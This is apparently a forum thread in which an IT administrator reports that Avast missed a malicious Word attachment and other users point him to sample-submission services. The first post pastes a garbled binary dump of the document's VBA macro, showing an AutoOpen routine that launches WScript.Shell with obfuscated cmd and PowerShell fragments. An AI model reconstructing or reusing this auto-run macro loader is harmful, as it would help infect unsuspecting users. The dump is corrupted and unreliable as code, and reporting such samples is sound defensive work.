Missed mail message

I received a suspicious email message and looked at the contents via text editor. Some of the message concerns me as I’d have to perform cleaning on a coworker’s computer if they had blindly opened it. Shouldn’t this sort of thing be caught?

Some contents from the attachment:

WScript.Shell$pBPrxh1oÿÿhÿÿÿÿ`ÿÿÿÿ±Attribute VB_Name = "VndRBbniaq"

Sub AutoOpen()
On Error ResubNext
CreateObject("WScript.Shell").Run! ChrW( 2 + 3950)	ztXZmEVS
hzGljvbXiwb
wbEBOkTwFzZJzK‚YjoLbPa PZiIjalhHCiaBzEQVavSQMiWUrRzTLkXKmtJwXBoa, 843069887 -a
End €txID="{E9C25DD8-1F86-4D50-A06F-C826EF022DE9}"
Document=MMYbpnrz/&H00000000
Module=oGhNIGEoMzPhc
Module=VndRBbniaq
ExeName32="amiiiSXjuQZkqY"
Name="Project"
HelpContextID="0"
VersionCompatÌa¯ÿ		ä *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library¼*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal9IX](*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library

Attribute VB_Name = "oGhNIGEoMzPhc"
Function wbEBOkTwF()
On Error ResupNext
i HNMbjŠ46446 / wwwpVf
  ‚ 6933586YhVEE -  jKFCQaBthZR*IsArray nhsYwArBsfnA^fOSuz¤M@" + "d /v:^on^" ^  	/rCStr(Chr(EXVUXj€iYRToZMBoJflHUWcHJUB€34DALsKFcubFwEwPJaiCfkbl))"s^‚0e^T€VarType CDate(143449149€XGdutGiprnDAWK P^X^H$='^ pow^er( 0e^ll -„
 ^J^:BIƒE:„ I^‰DCur(XilZn‚u±LMbaj€F¿…©YMiWXK€
TGspYZ €* kUqzwA zJiAn€Ybz DSmnWÁq":D^SB"w^:Â9ƒG{^:Z^,Q‚^B3aCC&#Á‚:bwBiÃÔ^GCo€,€,„Hex(lbDzWkÀzfinShAÀPjKjGÀFrsVQ‹0Sqr@(37376ÀcI VJHalÀ	68087ÀrCEbskin(RZmthzËMonth(NarlcAwuBGCkB^44H,^:^&I„/B5B.@GU1Â^:d‰165Î8À\ƒ36A…€F=8AzDwYÀTqNUNwN:ƒ´@Fqƒ Zƒ,Bi„$E;:bb„XBp:ÀWˆàA tn(75Ë"Second(UXVoZC€iHmVqhAGÁU:^bgB"#:D(±$J:^cÃLâ":ƒH^YÂ^:,g!%LLog(8372¡145846ceeQHiHhuàNFnFlS‚z Q86839`9ÀFVLSsD"€…A=tclUXh€`sqzMd"$¤9P^:CqDaD6B†#e7ƒ,:q:$!6:C8d^L^w51613à49 5
‘41833@Dpopia+`Kb;ztzU@dYjbYSAB²k„Gkeâ
w)˜p:^àJB:YEh0(:C{B`>Z,fBCh:^¡mcY,Bz¤G8:^ZIOct(wUpsdSK.&M!A61540ÀcEruNad16717@fwZVYwƒ#¥.IBmRM3 UGchY"RzzZp`dijdA«HCXDC W cOdDT@COqrzÀ73025
LiNmOlLjA‚‰g^BD^#ÄC^{$^‚Zƒ B^1:Cc P8:Uw#B7
"
eKRouàW32424àGjujOKTimeValue(IiiajV£Åa246060082
fdtArdNdHZjla6Ggd6d¦:C5@IH:„].£m@v N‚8`5ÄOwBv¤G^;:^Jaƒ,`g
¥*C(MzWTnACk#3984àHFbnRIPhMÌjZa€
^G£	Ī{@@â2 $@wBbÁ/^:G;À°Ý#tåÃÀGdá#f}%àiv+ ék+ Ia+ CR+ (K+s }dD+ 3:ð×0+’ X + I+ è;71+4ÔK†,‘E59500'52241 DcKmcCÁqEtWI“ör;/ nAPKz€j
End õŒ˜zZJzKYo<e c±~a’(F°zKzp£µ9‚4`78258¢áú7mioV”xò Äb6Dbl(ZIHMSJàiYbfUQ €$0:G(›By^ÀµN^E`2_c¤'ä[ð6B^Å‚,È^:qT.:6€è) rovPD <23H590e30‘Q-@ iTEAaÀQOOVYpWTqhT
cwFo€EaZvHDhÑ
˜C^8ãaÓb^w°i¤H;Ãbwôd4
ðQ`dxk4jdfRjJay9s³tYhqwD SklcrJ!UpoN‘ŒXp0zNQd€?875520zzKjaôQE"3EJLzKUG³ÕWYJnJ`IuzBG
@acioUa^#ÔG^kƒ:^Æd„t^l:H³R;à:LgB4:ôG8¤b¥”CÓð|{ÐiÅ54961ÀhwzZrmP	 lwuJfp58,74ó¥A aSija]cDAXDMlo2~0Z^weCð²D°J	a:Be
²H%’V^,Ë1Y²G :N¢ula 'à	V.98275àwQLstcò##v3452ehMNMdpP
XTi„boÐMhTpÁÀilHRZqZÑ? awpTR bJøKUi’$P”@ôZ?\³cãS.g¼:v2
t–BÀ
A70091Ð	V wavnV`$82‚6ѧszXoHB
Ãfä+SfjMB¦133@‘* wVYij@7218a!CPEzvoY~z" Åd²	`–pe¢Z]p'pe%5BD:õ¤b,P¡w#
QãMÐÉóD+ ù:+ d-`g¦" _+ D	Š480XðKisNQ‚jÀeaGpKLq`JkfRiû¢×uPHZBiZ€®VA{XtnzkÀE0ovAY»v#Cv8koZ`ÿ[’éjohLbPï[eä[UCos(-eá31405Ð	CsLLzBv`7138áwvIRS]402„88ð
3399ƒ^e7qÌü-!aSjEJ‚mÀDViVP2+‚p„BC{:^Y…Ãð82G^#:€©²e“i´^HpÞ`a":@«´ñŸ"H^I^:RÙ8b281A!…DzTTT‚a,`:^z:D¢!ø¹ "I^" + ":Vwp^BN€^E^,^:P,0B"
iHNMbj = Sgn(358)
   Var Type Na@me(6332IsArray 80382 / Hwbha
wadHLE"^o^:Hw,^:^d¢:B^wD"&L©:vG^{›a,B2:G%E:qwBp1C^{0¼Val(4P]CByte(5[kHRjnqNa^,BB/…!8^:U@:^`:C‚/{:^…„	B\w:^Gk€…f#"g„rJ¨w^BS^„'q€K	³dObNzo * FCkjHC - FLCrjW¥iBUq

RiEjupYjsW,7ƒ(ƒO,„:Za^gB3ƒ¨H^o„>I:ÉCDa€@7315)ÀJiMCLUSszdrA9:CV:ÀÂJ9{2DÐ^U:.‚,€EF‚(<J:B^Iƒ®E…À8Â:À,6ZZCH€$eSqr(jFwYYva@$À™FŸLog(579@lHITPÂMÂ(Y:^.:‚mƏHÀ'BY€D%GkÀE¦Rmcap‚Z@XVEsziÀ6615€WWfa\tJB·E
A#2"S`tr(62»…-Round(33403ftsYz‚cÀ
GwaClS@:^Yw:r„>Câq‚':^XÅBÄÀ˜&(ƒB^JÄmBm…@Ìqeg:rX	LgêjoLb‚PeDViVPÀù`DzTTTÀCÞ+ ¹+ æG+ iÉh>+ %++ J! iIUGb`e59È804 
31`' oBftF*TimeÀmue(ih8RcdÃ'%áplOcUAÃÆ;93605À	swCzuW
End Function

% PZiIj(`aOn Error Resume Next
A©98225 gsddzA nsAAoà78027 SXPjvZbFoÁ3C+l:Hã.g :^Z^,c:`+â$1D‚(„‘ZgeÂB€“HIBfZ$\B06G;:^aB’eKCCura !oè©qMXtN YAktid

PYWHFro„KwÂ:o:Cã%@V \^3äG^,g:¤B:#p^:Gƒ¡%huZcc@8chdPIJ€
 "12`;FAE\Ecb9æ2[4¬¾LCase(zoGQt )GvORZŒGk!¥ :^k¤bE#Z^:d‚C:Ckc:^ewB#eÁ€æoLwCHMÀ61850AÀ26068`n0jRtoKƒ˜96ƒue@hDbVp advSWTwzocGwdfHPt‘^:e5^7…±7 ࢣ+R 9„¼$:'æÓäºBE^G#€ÅCd^wˆZUuAtL€+zFm
c«‹R@†GAMlBr@0BcnRmbm kLHLs@aFuUw@QrEwbb  BPEdNw
DWDsN`kSIYGaã=/KáÑTbÓB0‚^Ï`	4ÀÖ/+ '&p?ɤ+ ù+ ‡»QY1Yï:; lhHhCiaÿ:eô:æCBool(oWfitP%1Sin(2”{¦31XMHJXrqÀZTdlqhQI!:G3Ð,:R^Ä9pRõb:µ=:ˆCsEñ4C@%$8527±N804181‚70477€lBcE‚c!4dUXsM `pqQFX;!O83A,ATCTQsCó
•1889ORjKOzm
GPWOCD¡3p;gat^L::ãC+´+dIS@w.¤H^¨::K‚^Tœ^‚PžÀ
7Q5925árIIf±<AÑoszQDtð)KKlhið
73397ðHVMiWn£åÁ rUobbXkqGD@[°V iZcwIË8439¡zmYbR‚m°.rTzuOpsnUcvN
boYhTUQV!k9b¢
gB2‹rP8‚^:a€¢B^ló;C#:d^SÓ,^vF#£Uh^:bÛ>g™P:S°
%Sec"o :238}(Deàc(4000€ö!‚78310AzppDóå70021 tEiibp€itzibfÀKbthKC5`99€&tFWvaJ012006pnIzWzK
TjSPiDZHXCB.Ô.†H°›CšwB^i¤!`^HI:Ztm£0Û’(”ÄB9#ƒ!Cu90172@YHiFFH0	Z FtLZm€uT,iI ¹#C¡zoBuzÀjGiKa0iDruA
°pYµ7^ôU#dÃ;Aªƒea³fFAzAZsƒ÷) AChIMH0`OdhaTó¥Ca€(881SåInt(61670ApBOMRjp4994ÁRrVJdq›KQZLmjèqDSҁaÐ5 bbf^#‚Ô½^fCR,Î: $d„x::0yÂöC +Ä:I·<P9ÆÔ Rhvhf€	GT8qJbóVQcMYpnkf°NtjLrVa!7388!wfPcF21136 pNtqa¡fwCTM‘u€<7&9Û8Á51á,dlwaYoiwNpÞF!ed
Ä€	"ÓHcxC::€bP0KCC@
ösCzkZpBQ£-•qVa„uz AKjbâƒÙ#†301240 jFTjm€FQsXbiSPqzò¿@.‡ 0|D$S	&C2	 s^e“T ^ c
H^q=:!CXSÐrc!Ø&&SÀ*$7Ñ¢À!u7514Q¾pu0jsui¥KoˆhuuqeAUG°\ƒ@feOct(2±(`fnqCJ1ãaE^T3	À43^dG=£!^€
Å;0ø^=hR
@
0
³u€'öoà{Âc+ FS+ ÷A–µ + jGiKt@ziiDruÐKQZLmjqDSo`dlwaYo iwNpF4FQsXbiSPqzr4fnqCJ

   IsArray CCur(2)&iHNMbj = aViLYX / 24379nWRmm~AHYwNu

End Fun€ction
	€ BzEQV(LOn Error Resume @Next
_C€Dbl(517)bTiIpknZQjFx" s^E"p"t ^ ^	  ^ k^eP
Y=^!T^4ƒ3Gƒ"2Str(WcIYh - mhAsl€6|VarType Fix(9079€
AiIYaTZwDTc	A:`&=n^!\&&‚„A€Neƒ
T ^LƒG0=!^kƒP^Yá
:$=^‰K<|a€EˆUiQTDIoGcCcIfSUDy‚ !ƒA& 2s1t FG@ ^H7M1S=Ã!‰CL^G0^:M =^j!&ƒU Š& bhSinÀKSpBuEË„79213€„zEqjOkÀ29954 * zQjWk
ÀHaTrOaA-˜S^E r cØKmCoÃ'7MÃ1^S:(^=s!À#…hRnd(@MOzbpE€W°EVES@G‰MCÁM azbTDmD DhMavA &@‘^TÃ!Ñ v^*Bƒ6ƒaCK!cd^Kƒ
mCkÅ 82032€lkKOCÎEfqpNiC€RfJcTi€FnNJupU€F 59728‹O62PjfpjuQA@¸JkfjHÀcVLYnp
Q€PfwcbzOÁ/ˆ:^,'=^Q)UÀ¡sC'EÆ^¤Aƒ¢j^p=!v!%|Hex(BlJshD 
247„96á8734 OESj'vfWDaBAB^6
aÄ:.
=^OÀ`B1EF  s 4åLo€g(52058 e ZdwrDmLY@jPHGEIA
^ÎeE1`zƒ2VnAxäjjpÃ:B
`U=Â^ã!&seCA‡£€@Åka=!V‚ n:^#^D_0¨H@ncjkfK`X mOJHqË2ztuSzJ`7aqYdhbå;SecoP4lN10726a9GwvH
{IWcaJ MMvmN&ˆSE^T¡â NCtf`Y#ea:^{#=^4g¢AÄ; SC¢ Z ˆ^gnÂ0^9`‚NbC^t:/"ð^=^u{F©¡£8321„½Å7ÀGinadvàBpMbvsiLbSP‚Zà"jIrTZC #BAGUvF*	 Z99@!FrjEcwfuzd

qQQMSGV¬rX –tâ  V1å–^EHbF!gn•# 0Ã9Ã:;e:hM^!&às"A^L	uuIbG‚z€75244â2¦«Oct(KMfoFàdorLE¢kl %`%b
a%-‚ŠChr(UhvLzWYJU 
wOHTjMDAhàf+ QZMAuTIt@ZWwkvwQFFL)ú)À"`Sªbáà	Ü$+ IÍ+ $½+ 9„§+ …˜ å+ Iƒs+ †j+ ó%+ò §+ £
*)±?"na@	æpjGjiK«|
ible32="393222000"
CMG="2E2C291D7965A369A369A369A369"
DPB="5C5E5B4BA778A878A878"
GC="8A888DA1BAA2BAA245"

[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

[Workspace]
MMYbpnrz=0, 0, 0, 0, C
oGhNIGEoMzPhc=25, 25, 1385, 693, 
VndRBbniaq=50, 50, 1410, 718, 
MMYbpnrzMMYbpnrzoGhNIGEoMzPhcoGhNIGEoMzPhcVndRBbniaqVndRBbniaqþÿ
ÿÿÿÿ	ÀF Microsoft Word 97-2003 Document

I can forward the original message for you to look at if there’s someone on staff to receive it.

Thanks,

-Tim-

You can check suspicious mail (s) here >> https://www.opswat.com/free-tools/mesc-faq

Suggesting I go to another website or another company is asinine…

Maybe I’m in the wrong place… I’m trying to report a problem with the Avast software not doing its job. I’m supposed to be protected from this:


https://s33.postimg.cc/gm0jvzwt7/avast_Protection.png

Or, maybe I have the wrong software for my company’s antivirus needs…

Update to the latest version (18.6.2349): https://forum.avast.com/index.php?topic=221320.0

So… just for thoroughness I forwarded the message to the sanitize@metadefender.com address. I immediately got a response:

  sanitize@metadefender.com
    host smtp.antispamcloud.com [5.79.72.139]
    SMTP error from remote mail server after end of data:
    550 Message contained unsafe content (Sanesecurity.Badmacro.Doc.jpecomp)

And, in the header attachment, I notice this little blurb:

X-Antivirus: Avast (VPS 180822-2, 08/22/2018), Outbound message
X-Antivirus-Status: Clean

This was all after I updated to newest version of Avast.

You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php

Maybe I'm in the wrong place.. I'm trying to report a problem with the Avast software not doing its job. I'm supposed to be protected from this:
No security program have 100% detection or zero false positives

How to report if you think avast should detect >> https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438

If mail contains a attachment you can upload and check it here >> www.virustotal.com
If detected, file will be shared among all those vendors not detecting it

You may post link to scan result here

Reported.

Results:


https://s33.postimg.cc/57d9iz1u3/scan_Results.png

I get that not every anti-virus program is 100% because it’s not possible to guard against threats that have not been invented. I was trying to report something. Please read the full message before garnishing your pre-programmed responses. The last line of my first post was referring to the step that we just arrived at (reporting the problem).

These emails are unfortunately not infrequent and if they hadn’t increased in numbers lately I wouldn’t be trying to reach out. I’ve been lucky and not had any of my coworkers open anything, but I don’t know if I’ll continue to have that luck. I’m handling the IT for a construction company so the people I’m working with aren’t necessarily the most computer savvy.